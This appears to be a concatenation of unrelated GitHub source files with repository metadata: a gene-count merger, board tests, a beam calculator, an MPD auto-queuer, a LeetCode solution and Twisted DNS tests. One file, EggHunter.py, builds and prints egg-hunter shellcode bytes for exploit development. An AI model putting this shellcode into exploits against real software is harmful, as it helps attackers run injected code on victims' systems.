_INPUT_DIR = "/Users/langyy/Desktop/Differential_expression/htseq_count"

MightyList = [
    open("{0}/MV{1:02d}_rep{2:02d}_htseq_count".format(_INPUT_DIR, mv, rep), 'r')
    for mv in range(1, 21)
    for rep in (1, 2)
]

outputfile = open("/Users/Neurospora/Desktop/Joseph_Things/MergedHTSeq.txt", 'w')
outputfile2 = open("/Users/Neurospora/Desktop/Joseph_Things/GeneNames.txt", 'w')

MIGHTYDICTIONARY = {}  # gene id -> tab-separated counts (one column per file)
GeneNames = []         # gene ids in the order they appear in the first file

# Seed the table (and the gene ordering) from the first file.
for line in MightyList[0]:
    word = line.split("\t")
    MIGHTYDICTIONARY[word[0]] = word[1].strip()
    GeneNames.append(word[0])

# Append one column of counts from each of the remaining 39 files.
for handle in MightyList[1:]:
    for line in handle:
        word = line.split("\t")
        MIGHTYDICTIONARY[word[0]] = MIGHTYDICTIONARY[word[0]] + "\t" + word[1].strip()

# Header row: one label per input file, in the same order as the columns.
print("VVD25DD0R1", "VVD25DD0R2", "VVD25DD4R1", "VVD25DD4R2", "VVD25DD8R1", "VVD25DD8R2", "VVD25DD12R1", "VVD25DD12R2", "VVD25DD16R1", "VVD25DD16R2",
      "VVD28DD0R1", "VVD28DD0R2", "VVD28DD4R1", "VVD28DD4R2", "VVD28DD8R1", "VVD28DD8R2", "VVD28DD12R1", "VVD28DD12R2", "VVD28DD16R1", "VVD28DD16R2",
      "WT25DD0R1", "WT25DD0R2", "WT25DD4R1", "WT25DD4R2", "WT25DD8R1", "WT25DD8R2", "WT25DD12R1", "WT25DD12R2", "WT25DD16R1", "WT25DD16R2",
      "WT28DD0R1", "WT28DD0R2", "WT28DD4R1", "WT28DD4R2", "WT28DD8R1", "WT28DD8R2", "WT28DD12R1", "WT28DD12R2", "WT28DD16R1", "WT28DD16R2", sep="\t", file=outputfile)

# One row per gene: the gene list goes to its own file, the merged counts
# (followed by a blank line, as before) to the matrix file.
for name in GeneNames:
    print(name, file=outputfile2)
    print(MIGHTYDICTIONARY[name], "\n", sep='', file=outputfile)
| [
"noreply@github.com"
] | Joenetics.noreply@github.com |
146bf001cc5f3214112f5172ac029e9870f52731 | 6fa775fa81d8aadc9cb1351e980508e0b623dec7 | /bingo_backend/BoardManagement/test_board_management.py | c1578f7873d3c6eef0b62180dee49ad1152ce2a9 | [] | no_license | francica/iOSGameAPI-Backend | 322a267a0d2650b471ab0bfc6994649804ab1f8e | ccaef36abad222ee7cf46d9dda3032829e1db0bf | refs/heads/master | 2021-01-19T04:44:23.000049 | 2016-04-25T01:13:43 | 2016-04-25T01:13:43 | 69,634,126 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,477 | py | from unittest import TestCase
__author__ = 'Robert'
from board_management import BoardManagement
import json
class TestBoardManagement(TestCase):
    """Unit tests for BoardManagement's board/pen lifecycle and its JSON API.

    All calls go through JSON payloads, mirroring how the game server feeds
    updates to the board manager.
    """

    def test_add_new_game_board(self):
        """A freshly added board keeps the given id and has no pen colour."""
        bm=BoardManagement()
        bm.add_new_game_board(None, None,1)
        self.assertEqual(None,bm.game_board[1].board_segment_list[0].pen.pen_color)
        self.assertEqual(1,bm.game_board[1].board_id)

    def test_update_pen(self):
        """update_pen stores the new pen on the next board segment."""
        bm=BoardManagement()
        bm.add_new_game_board(None,None,1)
        data={}
        data['pen_color']=(128,256,120)
        data['pen_width']=.25
        data['room_id']=1
        json_data=json.dumps(data)
        bm.update_pen(json_data)
        self.assertEqual(.25,bm.game_board[1].board_segment_list[1].pen.pen_width)
        # NOTE(review): board_id appears to advance when the pen is updated --
        # confirm that this is intended behaviour of update_pen.
        self.assertEqual(2,bm.game_board[1].board_id)

    def test_update_board(self):
        """update_board records the drawn segment's changed pixels."""
        bm=BoardManagement()
        bm.add_new_game_board(None,None,1)
        data={}
        data['pen_color']=(128,256,120)
        data['pen_width']=.25
        data['room_id']=1
        json_data=json.dumps(data)
        bm.update_pen(json_data)
        data['start_point']=(2,2)
        data['end_point']=(4,3)
        data['room_id']=1
        json_data=json.dumps(data)
        bm.update_board(json_data)
        self.assertEqual(data['start_point'][0],bm.game_board[1].board_segment_list[1].pixels_changed[0][0])

    def test_get_board(self):
        """get_board serialises the accumulated segments of one board."""
        bm=BoardManagement()
        bm.add_new_game_board((255,255,255),.5,1)
        data={}
        data['pen_color']=(128,256,120)
        data['pen_width']=.25
        data['room_id']=1
        json_data=json.dumps(data)
        bm.update_pen(json_data)
        data['start_point']=(2,2)
        data['end_point']=(4,3)
        data['room_id']=1
        json_data=json.dumps(data)
        bm.update_board(json_data)
        # making a second board
        data['pen_color']=(54,3,4)
        data['pen_width']=.2
        data['room_id']=1
        json_data=json.dumps(data)
        bm.update_pen(json_data)
        data['start_point']=(3,9)
        data['end_point']=(43,23)
        data['room_id']=1
        json_data=json.dumps(data)
        bm.update_board(json_data)
        # making a third board
        data['pen_color']=(2,29,4)
        data['pen_width']=.8
        data['room_id']=1
        json_data=json.dumps(data)
        bm.update_pen(json_data)
        data['start_point']=(12,9)
        data['end_point']=(45,231)
        data['room_id']=1
        json_data=json.dumps(data)
        bm.update_board(json_data)
        # making get_board json obj
        data['room_id']=1
        data['board_id']=1
        json_data=json.dumps(data)
        json_str=bm.get_board(json_data)
        # No assertion here -- this only exercises serialisation and prints it.
        print(json_str)
| [
"robertfinedore@gmail.com"
] | robertfinedore@gmail.com |
f97f994caeaabd7001c98a15ab0099771313d83d | 99dbbe9d1d47125d3e30be50721872749dc4e071 | /simple-dist.py | 53241fa04a37605202e26096e7e5d9834bea5d67 | [] | no_license | rcbeneduce/aba-structural-analysis | 135ee0a844fa049ea0c50096622b4cd63bb10c45 | e9ebe2687075e8c91430265892798e49a1906263 | refs/heads/master | 2023-02-19T17:50:36.430929 | 2021-01-21T03:45:51 | 2021-01-21T03:45:51 | 270,466,827 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,096 | py | #This section of code is for defining the simply span beam of a distributed load
def simpledistbeam(w,L,x,a,b,E,I):
if(complex2=='1'):
supportA=w*L/2
supportB=w*L/2*-1
def shear(x):
return w*((L/2)-x)
def bending(x):
return(w*x/2)*(L-x)
def deflection(x):
return((w*x)/(24*E*I))*((L**3)-(2*L*x**2)+(x**3))
elif(right=='1'):
supportA=w/3
supportB=2*w/3*-1
def shear(x):
return(w/3)-((w*x**2)/L**2)
def bending(x):
return(w*x)/(3*L**2)*((L**2)-(x**2))
def deflection(x):
return((w*x)/(180*E*I*L**2))*((3*x**4)-(10*L**2*x**2)+(7*L**4))
elif(right=='0'):
supportA=w/2
supportB=w/2*-1
if (x<=(L/2)):
def shear(x):
return(w/(2*L**2))*((L**2)-(4*x**2))
def bending(x):
return w*x*(0.5-((2*x**2)/(3*L**2)))
def deflection(x):
return((w*x)/(480*E*I*L**2))*((5*L**2)-(4*x**2))**2
elif(x>(L/2)):
def shear(x):
return (w/(2*L**2))*((L**2)-(4*(L-x)**2))
def bending(x):
return w*(L-x)*(0.5-((2*(L-x)**2)/(3*L**2)))
def deflection(x):
return ((w*(L-x))/(480*E*I*L**2))*((5*L**2)-(4*(L-x)**2))**2
print ('The reaction force at support A is:',round(supportA,5),'kips')
print ('The reaction force at support B is:',round(supportB,5),'kips')
print ('The shear force at',x,'inches is:',round(shear(x),5),'kips')
print ('The bending moment at',x,'inches is:',round(bending(x),5),'kips-in')
print ('The deflection of the beam at',x,'inches is:',round(deflection(x),5),'inches')
#This section of code is for graphical representation.
G=np.arange(0.0,L,0.01)
P=np.arange(0.0,(L/2),0.01)
N=np.arange((L/2),L,0.01)
if (complex=='no' or right=='1'):
plt.subplot(313)
plt.plot(G,-1*deflection(G),'r')
plt.plot(G,(G*0),'k')
plt.xlabel('Length (in.)')
plt.ylabel('Deflection (in)')
plt.grid(True)
plt.fill_between(G,-1*deflection(G),alpha=0.2, hatch = '/')
plt.subplot(311)
plt.title('Analysis of your Member')
plt.plot(G,shear(G),'r')
plt.plot(G,(G*0),'k')
plt.ylabel('Shear (kips)')
plt.grid(True)
plt.fill_between(G,shear(G),alpha=0.2, hatch = '/')
plt.subplot(312)
plt.plot(G,bending(G),'r')
plt.plot(G,(G*0),'k')
plt.ylabel('Bending Moment (kips-in)')
plt.grid(True)
plt.fill_between(G,bending(G),alpha=0.2, hatch = '/')
plt.tight_layout()
plt.show()
elif(right=='0'):
def Sp(x):
return(w/(2*L**2))*((L**2)-(4*x**2))
def Sn(x):
return(w/(2*L**2))*((L**2)-(4*(L-x)**2))*-1
def Mp(x):
return w*x*(0.5-((2*x**2)/(3*L**2)))
def Mn(x):
return w*(L-x)*(0.5-((2*(L-x)**2)/(3*L**2)))
def Dp(x):
return((w*x)/(480*E*I*L**2))*((5*L**2)-(4*x**2))**2*-1
def Dn(x):
return((w*(L-x))/(480*E*I*L**2))*((5*L**2)-(4*(L-x)**2))**2*-1
plt.subplot(313)
plt.plot(P,Dp(P),'r')
plt.plot(N,Dn(N),'r')
plt.xlabel('Length (in.)')
plt.ylabel('Deflection (in)')
plt.grid(True)
plt.plot(G,(G*0),'k')
plt.fill_between(P,Dp(P),alpha=0.2, hatch = '/')
plt.fill_between(N,Dn(N),alpha=0.2, hatch = '/')
plt.subplot(311)
plt.plot(P,Sp(P),'r')
plt.plot(N,Sn(N),'r')
plt.title('Analysis of your Member')
plt.plot(G,(G*0),'k')
plt.ylabel('Shear (kips)')
plt.grid(True)
plt.fill_between(P,Sp(P),alpha=0.2, hatch = '/')
plt.fill_between(N,Sn(N),alpha=0.2, hatch = '/')
plt.subplot(312)
plt.plot(P,Mp(P),'r')
plt.plot(N,Mn(N),'r')
plt.plot(G,(G*0),'k')
plt.ylabel('Bending Moment (kips-in)')
plt.grid(True)
plt.fill_between(P,Mp(P),alpha=0.2, hatch = '/')
plt.fill_between(N,Mn(N),alpha=0.2, hatch = '/')
plt.tight_layout()
plt.show()
return
| [
"noreply@github.com"
] | rcbeneduce.noreply@github.com |
ae09834689a7ed3701d3ef9439f82ccc31caa63b | 3e4d78628a66927e2a640ca4f328adcc31e156b9 | /deejay/queuer.py | be6d7a434cdd0da2d3e15b533b77f38a4bf36a50 | [] | no_license | nijotz/shitstream | 360d41a1411dc480dd220790f9513d202a18ee78 | 7d11171fb35aaf6d778d5bf23046d220939711be | refs/heads/master | 2021-01-01T16:19:22.224760 | 2014-10-16T22:48:17 | 2014-10-16T22:48:17 | 23,303,299 | 5 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,892 | py | import os
import re
import pyechonest.config
import pyechonest.song
import pyechonest.playlist
from downloaders.youtube import search as youtube_search
from mpd_util import mpd
from server import app
import settings
pyechonest.config.CODEGEN_BINARY_OVERRIDE = settings.dj_codegen_binary
pyechonest.config.ECHO_NEST_API_KEY = settings.dj_echonest_api_key
logger = app.logger
@mpd
def queuer(mpdc):
    """Daemon loop: keep the MPD play queue topped up.

    Whenever the playlist or player state changes, checks whether less than
    ten minutes of music remain and, if so, queues recommendations.
    Exceptions are logged and the loop restarts rather than dying.
    """
    while True:
        try:
            if should_queue(mpdc=mpdc):
                logger.info('Should queue, dewin it')
                queue_shit(mpdc=mpdc)
            else:
                logger.info('Should not queue')
            logger.info('Queuer waiting')
            # Block until MPD reports a playlist or player event.
            mpdc.idle(['playlist', 'player'])
        except Exception as e:
            logger.exception(e)
            logger.error('Queuer failure, starting over')
@mpd
def should_queue(mpdc):
    """Return True when fewer than ten minutes of queued audio remain.

    Sums the durations of the current song and everything after it, minus
    the elapsed time of the current song. False when nothing is playing.
    """
    now_playing = mpdc.currentsong()
    if not now_playing:
        return False
    playing_pos = int(now_playing.get('pos'))
    upcoming = [entry for entry in mpdc.playlistinfo()
                if int(entry.get('pos')) >= playing_pos]
    remaining = sum(float(entry.get('time')) for entry in upcoming)
    remaining -= float(mpdc.status().get('elapsed', 0))
    return remaining < 60 * 10
@mpd
def prev_songs(mpdc, num=5):
    """Return up to ``num`` most recently played songs, newest first.

    Walks backwards through the queue from the currently playing position,
    skipping station bumps. Empty list when nothing is playing.
    """
    now_playing = mpdc.currentsong()
    if not now_playing:
        return []
    playing_pos = int(now_playing.get('pos'))
    # Index the queue by position, excluding bumps.
    # FIXME: bumps filter needs dry
    by_pos = {}
    for song in mpdc.playlistinfo():
        if song.get('file', '').startswith(settings.dj_bumps_dir):
            continue
        by_pos[int(song.get('pos'))] = song
    recent = []
    for pos in range(playing_pos, -1, -1):
        if len(recent) >= num:
            break
        if pos in by_pos:
            recent.append(by_pos[pos])
    return recent
@mpd
def queue_shit(mpdc):
    """Queue one batch of recommendations based on recently played songs.

    For each recommended song, prefer an exact artist+title match in the
    local MPD library, fall back to any song by the artist, and finally to
    downloading the top YouTube search hit.
    """
    prev = prev_songs(mpdc=mpdc)
    recs = get_recommendations(prev)
    for song in recs:
        # Exact local match first.
        mpd_songs = mpdc.search('artist', song.artist_name, 'title', song.title)
        if mpd_songs:
            mpdc.add(mpd_songs[0].get('file'))
            continue
        # Any local song by the same artist.
        mpd_songs = mpdc.search('artist', song.artist_name)
        if mpd_songs:
            mpdc.add(mpd_songs[0].get('file'))
            continue
        # Last resort: fetch from YouTube via the server's download path.
        url = youtube_search(u'{} {}'.format(song.artist_name, song.title))
        if url:
            from server import add_url #FIXME
            def log(x):
                logger.info(x)
            add_url(url, log)
def find_youtube_vide(song):
    # Unimplemented stub (name presumably meant to be "find_youtube_video").
    pass
def get_recommendations(prev):
    """Return Echo Nest song recommendations seeded by previous songs.

    ``prev`` is a list of MPD song dicts; each is resolved to an Echo Nest
    song id, then a 'song-radio' playlist is requested from those seeds.
    Returns an empty list when no seed could be identified.
    """
    songs = []
    for song in prev:
        more_songs = identify_song(song)
        if more_songs:
            songs.append(more_songs)
    song_ids = [song.id for song in songs]
    if not song_ids:
        logger.info('No previous songs identified')
        return []
    logger.info('Identified {} previous songs'.format(len(song_ids)))
    result = pyechonest.playlist.static(type='song-radio', song_id=song_ids, results=10)
    return result[5:] # Does echonest return the five songs I gave it to seed? Looks like..
@mpd
def identify_song(song, mpdc):
    """Resolve an MPD song dict to an Echo Nest song object, or None.

    Searches by artist/title; if that fails, retries with punctuation
    stripped from both fields.
    """
    artist = song.get('artist')
    title = song.get('title')
    if not (artist or title):
        return #TODO: try harder
    results = pyechonest.song.search(artist=artist, title=title)
    if results:
        return results[0]
    logger.warn(u'No results for: {} - {}'.format(artist,title))
    # try stripping weird characters from the names
    artist = re.sub(r'([^\s\w]|_)+', '', artist)
    title = re.sub(r'([^\s\w]|_)+', '', title)
    results = pyechonest.song.search(artist=artist, title=title)
    if results:
        return results[0]
    logger.warn(u'No results for: {} - {}'.format(artist,title))

# The DJ "personality" entry point exported by this module.
personality = queuer
| [
"nick@nijotz.com"
] | nick@nijotz.com |
ead879fbe5703ccb2ef942594a46fa24810b29fc | e0c7f307a42a1d0f281b7d5075e54dc92a158635 | /mdp_api/api/apps.py | d510ec033214a0a29066d634211276c8711503af | [
"MIT"
] | permissive | namafutatsu/mdp_api | 53e68ab4ad245d3ba1a28f2aa7860d72063d4b6d | 9cd719bb05a8386f6db5272d650a8e20307ee059 | refs/heads/master | 2021-08-16T18:37:01.144244 | 2020-05-01T09:48:39 | 2020-05-01T09:48:39 | 172,598,415 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 152 | py | from django.apps import AppConfig
class DefaultConfig(AppConfig):
    """Django app configuration for the ``mdp_api.api`` application."""
    name = 'mdp_api.api'
    label = 'mdp_api_api'
    verbose_name = "mdp_api API"
| [
"victor@iso3103.net"
] | victor@iso3103.net |
1223460f79aa83654eb9c6e0e3b50f90b2366482 | a364f53dda3a96c59b2b54799907f7d5cde57214 | /easy/35-Search Insertion Position.py | 6c7c2e089fbf94d023498b845a9645138b07243e | [
"Apache-2.0"
] | permissive | Davidxswang/leetcode | 641cc5c10d2a97d5eb0396be0cfc818f371aff52 | d554b7f5228f14c646f726ddb91014a612673e06 | refs/heads/master | 2022-12-24T11:31:48.930229 | 2020-10-08T06:02:57 | 2020-10-08T06:02:57 | 260,053,912 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,153 | py | """
https://leetcode.com/problems/search-insert-position/
Given a sorted array and a target value, return the index if the target is found. If not, return the index where it would be if it were inserted in order.
You may assume no duplicates in the array.
Example 1:
Input: [1,3,5,6], 5
Output: 2
Example 2:
Input: [1,3,5,6], 2
Output: 1
Example 3:
Input: [1,3,5,6], 7
Output: 4
Example 4:
Input: [1,3,5,6], 0
Output: 0
"""
# it is pretty simple, since the array is monotonically increasing, we should check == first
# if not, check <, move toward the end if yes
# if found a nums[i] > target, it indicates that the target is >num[i-1] and target is < nums[i], return i
# if in the end, nothing found, add this target at the end of the original list
# time complexity: O(n), space complexity: O(1)
from bisect import bisect_left
from typing import List


class Solution:
    def searchInsert(self, nums: List[int], target: int) -> int:
        """Return the index of ``target`` in sorted ``nums``, or the index at
        which it would be inserted to keep ``nums`` sorted.

        Assumes no duplicates. Runs in O(log n) time / O(1) space via binary
        search (the original scanned linearly in O(n)).
        """
        # bisect_left is exactly this operation: the leftmost insertion
        # point equals the element's index when the target is present.
        return bisect_left(nums, target)
"wxs199327@hotmail.com"
] | wxs199327@hotmail.com |
1f9ea3f263e41581d79658b99f75d94333a4d0e1 | d82b8db38cf779b01be58fb9c0f74601b7cfc701 | /code/.env/bin/pasteurize | 08973d09291bc0f003fdd60724c3c29fe315ec75 | [
"MIT"
] | permissive | trantorrepository/3D-Human-Body-Pose-Estimation | ca37cab0d88f333511b03f4cc9dd3336a6df393f | a37e70787166988bbbb2ecdb24f6ed588754b917 | refs/heads/master | 2023-01-12T09:25:20.555027 | 2017-12-22T18:30:34 | 2017-12-22T18:30:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 264 | #!/Users/Simon/Documents/Repos/CS231n/Project/.env/bin/python
# -*- coding: utf-8 -*-
# Console-script shim installed by setuptools for the ``pasteurize`` tool
# (python-future): delegates straight to libpasteurize's CLI entry point.
import re
import sys
from libpasteurize.main import main
if __name__ == '__main__':
    # Strip setuptools' "-script.py"/".exe" wrapper suffix from argv[0]
    # so the tool reports its own name correctly.
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    sys.exit(main())
| [
"simon.kalouche@gmail.com"
] | simon.kalouche@gmail.com | |
1446d2b5be361206e6302012f1f4eada1e8e523b | 6fd007bd231aed0e3e9ea5824a606427698c08a4 | /computeBERTSentenceEmbedding.py | f51aa66f6a341b2ee5c67ecdbd581f7619367871 | [
"Apache-2.0",
"LicenseRef-scancode-public-domain"
] | permissive | cjf9028/BERT-Sentiment-Analysis-Amazon-Review | 51bece3a0580219a6495d71aa81b4c83e91a1e8b | 70b85b6e97c69e02feb4e34fdeecaef0931ab461 | refs/heads/master | 2020-04-16T02:41:40.683946 | 2018-12-28T09:18:21 | 2018-12-28T09:18:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,657 | py | # Call the command line output from here and read the output file
import subprocess,os, json
import numpy as np
# Try running command from here
# Run BERT's feature extraction as a subprocess: writes per-token activations
# of the last four layers to output_2.jsonl (one JSON object per input line).
# shell=True is acceptable here since the command string is fixed (no user input).
p = subprocess.Popen('python extract_features_n.py --input_file="./input.txt" --output_file="./output_2.jsonl" --vocab_file="../uncased_L-12_H-768_A-12/vocab.txt" --bert_config_file="../uncased_L-12_H-768_A-12/bert_config.json" --init_checkpoint="../uncased_L-12_H-768_A-12/bert_model.ckpt" --layers=-1,-2,-3,-4 --max_seq_length=128 --batch_size=8',stdout=subprocess.PIPE, shell=True)
p.wait()
# Should be a parameter
numLayers = 2          # how many of the extracted layers to concatenate (1-4)
embMode = "MAX"        # sentence pooling mode: SEP | CLS | AVG | MAX
numSent = 2            # NOTE(review): unused below -- confirm whether still needed
outputFile = "./BertVectors/SampleVec.txt"
printTokenization = 1  # 1 -> include the WordPiece tokenization in each output row
def handleNumLayers(numLayers, jsonObject):
    """Concatenate the 'values' vectors of the first ``numLayers`` layers of
    one token's JSON record (layers are ordered as extracted: -1,-2,-3,-4).

    Returns [] (after printing a diagnostic) for an out-of-range request,
    matching the original error behaviour.
    """
    layers = jsonObject['layers']
    # Generalized from a hard-coded 1..4 elif chain: accept any count up to
    # however many layers the extraction actually produced.
    if not 1 <= numLayers <= len(layers):
        print('Number of layers parameter not set to a valid value\n')
        return []
    vecSent = []
    for layer in layers[:numLayers]:
        vecSent = vecSent + layer['values']
    return vecSent
def genSentenceEmbedding(data, embMode, numLayers):
    """Pool one JSONL record of per-token BERT activations into a sentence vector.

    data      -- parsed JSON object from extract_features output (has a
                 'features' list of tokens, each with per-layer 'values')
    embMode   -- "SEP"/"CLS": use that single token's embedding;
                 "AVG"/"MAX": element-wise mean/max over all non-special tokens
    numLayers -- how many layers to concatenate per token (see handleNumLayers)

    Returns (vector, space-joined tokenization, line index), or "" when the
    record carries no line index (note: callers that unpack three values will
    fail on that path -- preserved from the original interface).
    """
    vecSent = []
    numWords = len(data['features'])
    if 'linex_index' in data.keys():
        line_index = data['linex_index']
    elif 'line_index' in data.keys():
        line_index = data['line_index']
    else:
        print('Line index not found')
        return ""
    if embMode == "SEP":
        # Embedding of the trailing [SEP] token.
        vecSent = handleNumLayers(numLayers, data['features'][numWords - 1])
    elif embMode == "CLS":
        # Embedding of the leading [CLS] token.
        vecSent = handleNumLayers(numLayers, data['features'][0])
    elif embMode == "AVG":
        for index in range(1, numWords - 1):  # exclude [CLS] and [SEP]
            vecWordL = handleNumLayers(numLayers, data['features'][index])
            if index == 1:
                vecSent = vecWordL
            else:
                vecSent = np.add(vecSent, vecWordL)
        # BUG FIX: average over the number of vectors actually summed,
        # numWords - 2 (all tokens except [CLS]/[SEP]).  The original
        # divided by (index - 2) == numWords - 4, skewing the average.
        vecSent = np.asarray(vecSent) / (numWords - 2)
    elif embMode == "MAX":
        for index in range(1, numWords - 1):  # exclude [CLS] and [SEP]
            vecWordL = handleNumLayers(numLayers, data['features'][index])
            if index == 1:
                vecSent = vecWordL
            else:
                vecSent = np.maximum(vecSent, vecWordL)
    else:
        print('The sentence embedding mode was not entered correctly')
    # Space-joined WordPiece tokens, including the special tokens.
    tokenized = ""
    for index in range(0, numWords):
        tokenObj = data['features'][index]
        tokenized = tokenized + " " + tokenObj['token']
    return vecSent, tokenized.strip(), line_index
#Open the file and process to aggregate word vectors to get the sentence vectors
print('Load the json object and write the wrapper')
with open(outputFile, encoding='utf-8',mode='w') as write_file:
    with open('output_2.jsonl', encoding='utf-8') as data_file:
        for line in data_file.readlines() :
            data = json.loads(line)
            vecSent,tokenizedSent,index = genSentenceEmbedding(data,embMode,numLayers)
            print(vecSent)
            print(tokenizedSent)
            print(index)
            # The line index encodes "<id>;;<label>" -- split it back apart.
            id = index.split(';;')[0]
            label = index.split(';;')[1]
            if printTokenization == 1:
                write_file.write(id + "\t" + label + "\t" + tokenizedSent + "\t" ) #" ".join(str(elem) for elem in vecSent))
            else:
                write_file.write(id + "\t" + label + "\t" ) #" ".join(str(elem) for elem in vecSent))
            # NOTE(review): array2string assumes vecSent is an ndarray; SEP/CLS
            # modes return a plain list -- confirm before switching modes.
            write_file.write(np.array2string(vecSent, precision=4, separator=' ',suppress_small=True))
            write_file.write("\n")
#Extract the embeddings for each word
print('Options entered: 1) Sentence Embedding Mode: ' + embMode + ' 2) Layers to be considered are: ' + str(numLayers))
print('The length of the vector being output is: ' + str(len(vecSent)))
| [
"doffery20@gmail.com"
] | doffery20@gmail.com |
d489d3858f96a45be324467e1fcc25a31913bf04 | 28ad76f4f4cd22de8d2cd1680dbf4fb9beaa4d24 | /anacrowdboticscom_ana_dev_402/urls.py | 7837c47d56c39afd4e03fa971a31a704b0d186ce | [] | no_license | crowdbotics-users/anacrowdboticscom-ana-dev-402 | 956d557b11a09883b6253d4c02758587628ecaec | ceaf01839ad07ce7d086009ac48f52f1a682cf05 | refs/heads/master | 2020-04-06T16:05:26.123052 | 2018-11-14T20:11:36 | 2018-11-14T20:11:36 | 157,605,004 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 939 | py | """anacrowdboticscom_ana_dev_402 URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.contrib import admin
urlpatterns = [
    url('', include('home.urls')),                  # app home pages
    url(r'^accounts/', include('allauth.urls')),    # django-allauth auth flows
    url(r'^api/v1/', include('home.api.v1.urls')),  # versioned REST API
    url(r'^admin/', admin.site.urls),               # Django admin site
]
| [
"sp.gharti@gmail.com"
] | sp.gharti@gmail.com |
61a01b7451393561120c1a80afc9f002860b1ea7 | 8272f8c86ff782ba68c665dc5b50b53eb30cbafb | /Tools/EggHunter.py | 4696d2228180bdf1b08e397ea01c6b49d8633e13 | [] | no_license | R3dFruitRollUp/OSCE | 06f8764669917d1a5c6405882b3f64c81e030601 | 2996c80e53f6e824f4cfa7414e77c6e93e9118f0 | refs/heads/master | 2020-03-21T10:00:32.602423 | 2018-06-12T02:43:23 | 2018-06-12T02:43:23 | 138,429,201 | 0 | 1 | null | 2018-06-23T19:48:48 | 2018-06-23T19:48:48 | null | UTF-8 | Python | false | false | 2,036 | py | #!/usr/bin/python
# Python 2 script: plugs a user-supplied 4-byte egg into Skape's NtDisplayString
# egg-hunter stub and prints the resulting opcode/shellcode strings.
import binascii
import time
import sys
# colors (*NIX systems only)
W = '\033[0m'  # white
R = '\033[91m'  # Light Red
G = '\033[32m'  # green
M = '\033[95m'  # Light magenta
# the script takes user supplied egg as input and plug it to Skape's piece of art! the output (opcode) is debugger and binary file friendly.
# Reference: "Safely Searching Process Virtual Address Space" skape 2004 http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf
#    0:  66 81 ca ff 0f          or     dx,0xfff
#    5:  42                      inc    edx
#    6:  52                      push   edx
#    7:  6a 02                   push   0x2
#    9:  58                      pop    eax
#    a:  cd 2e                   int    0x2e
#    c:  3c 05                   cmp    al,0x5
#    e:  5a                      pop    edx
#    f:  74 ef                   je     0x0
#   11:  b8 54 30 30 57          mov    eax,0x57303054     egg = "T00W"
#   16:  8b fa                   mov    edi,edx
#   18:  af                      scas   eax,DWORD PTR es:[edi]
#   19:  75 ea                   jne    0x5
#   1b:  af                      scas   eax,DWORD PTR es:[edi]
#   1c:  75 e7                   jne    0x5
#   1e:  ff e7                   jmp    edi
if len(sys.argv) < 2:
    print "Usage: python EggHunter.py <"+G+"egg"+W+">"
    sys.exit(0)
Input = str(sys.argv[1])
Egg = binascii.hexlify(Input)
Egg = list(Egg)
# Reorder the hex digit pairs into the little-endian dword immediate that
# follows the "mov eax," opcode (b8) in the stub above.
OpCode = Egg[6]+Egg[7]+Egg[4]+Egg[5]+Egg[2]+Egg[3]+Egg[0]+Egg[1]
Shellcode = "\\x"+Egg[6]+Egg[7]+"\\x"+Egg[4]+Egg[5]+"\\x"+Egg[2]+Egg[3]+"\\x"+Egg[0]+Egg[1]
# Stub bytes before/after the egg immediate (see disassembly above).
FinalOpcode = "6681caff0f42526a0258cd2e3c055a74efb8" +M+ OpCode +W+ "8bfaaf75eaaf75e7ffe7"
FinalShellcode = "'\\x66\\x81\\xca\\xff\\x0f\\x42\\x52\\x6a\\x02\\x58\\xcd\\x2e\\x3c\\x05\\x5a\\x74\\xef\\xb8" +M+ Shellcode +W+ "\\x8b\\xfa\\xaf\\x75\\xea\\xaf\\x75\\xe7\\xff\\xe7'"
print "["+G+"+"+W+"] Egg Hunter shellcode with egg of '"+M+Input+W+"'.."
time.sleep(1)
print R+"Final Opcode    "+W+": " + FinalOpcode
print R+"Final Shellcode "+W+": " + FinalShellcode
| [
"hashem.jawad@yahoo.com"
] | hashem.jawad@yahoo.com |
db1b2374c6afaa2d2fe5ed4e597a9e4b87926cd0 | 238e46a903cf7fac4f83fa8681094bf3c417d22d | /VTK/vtk_7.1.1_x64_Release/lib/python2.7/site-packages/twisted/names/test/test_names.py | d882eefdb044c15cc6b244c74e388d368578da5e | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] | permissive | baojunli/FastCAE | da1277f90e584084d461590a3699b941d8c4030b | a3f99f6402da564df87fcef30674ce5f44379962 | refs/heads/master | 2023-02-25T20:25:31.815729 | 2021-02-01T03:17:33 | 2021-02-01T03:17:33 | 268,390,180 | 1 | 0 | BSD-3-Clause | 2020-06-01T00:39:31 | 2020-06-01T00:39:31 | null | UTF-8 | Python | false | false | 36,147 | py | # Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Test cases for twisted.names.
"""
import socket, operator, copy
from StringIO import StringIO
from functools import partial, reduce
from twisted.trial import unittest
from twisted.internet import reactor, defer, error
from twisted.internet.defer import succeed
from twisted.names import client, server, common, authority, dns
from twisted.names.dns import Message
from twisted.names.error import DomainError
from twisted.names.client import Resolver
from twisted.names.secondary import (
SecondaryAuthorityService, SecondaryAuthority)
from twisted.test.proto_helpers import StringTransport, MemoryReactorClock
def justPayload(results):
    """Return the payload objects from the answer section of a lookup result.

    ``results`` is the (answers, authority, additional) tuple a resolver
    lookup fires with; only the answer records' payloads are extracted.
    """
    answers = results[0]
    payloads = []
    for header in answers:
        payloads.append(header.payload)
    return payloads
class NoFileAuthority(authority.FileAuthority):
    """A L{FileAuthority} seeded directly from in-memory records.

